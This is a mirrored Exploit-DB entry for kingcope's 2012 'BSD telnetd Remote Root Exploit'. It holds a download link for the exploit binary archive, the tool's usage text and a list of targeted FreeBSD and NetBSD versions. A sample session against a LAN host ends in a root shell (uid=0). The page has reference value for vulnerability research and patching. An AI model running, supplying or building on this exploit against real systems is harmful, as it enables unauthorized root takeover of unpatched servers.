BSD – ‘TelnetD’ Remote Command Execution (2)

• Exploit Database
• 10 阅读

• 作者： kingcope
  日期： 2012-07-01
• 类别：

  • remote
  平台：

  • bsd
• 来源：https://www.exploit-db.com/exploits/19520/

• This exploit was leaked on the Full Disclosure mailing list:
  
  http://seclists.org/fulldisclosure/2012/Jun/404
  
  
  Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19520.zip
  
  
  BSD telnetd Remote Root Exploit *ZERODAY*
  By Kingcope
  Year 2011
  
  usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
  [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
  src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
  [port]]
  TARGETS:
  0 FreeBSD 8.2 i386
  1 FreeBSD 8.0/8.1/8.2 i386
  2 FreeBSD 7.3/7.4 i386
  3 FreeBSD 6.2/6.3/6.4 i386
  4 FreeBSD 5.3/5.5 i386
  5 FreeBSD 4.9/4.11 i386
  6 NetBSD 5.0/5.1 i386
  7 NetBSD 4.0 i386
  8 FreeBSD 8.2 amd64
  9 FreeBSD 8.0/8.1 amd64
  10 FreeBSD 7.1/7.3/7.4 amd64
  11 FreeBSD 7.1 amd64
  12 FreeBSD 7.0 amd64
  13 FreeBSD 6.4 amd64
  14 FreeBSD 6.3 amd64
  15 FreeBSD 6.2 amd64
  16 FreeBSD 6.1 amd64
  17 TESTING i386
  18 TESTING amd64
  Trying 192.168.2.8...
  Connected to 192.168.2.8.
  Escape character is '^]'.
  Trying SRA secure login:
  *** EXPLOITING REMOTE TELNETD
  *** by Kingcope
  *** Year 2011
  USING TARGET -- FreeBSD 8.2 amd64
  SC LEN: 30
  ALEX-ALEX
   6:36PMup 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
  USER TTYFROMLOGIN@IDLE WHAT
  kcopepts/0192.168.2.3 6:32PM 4 _su (csh)
  FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
  02:41:51 UTC 2011
  root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERICamd64
  uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)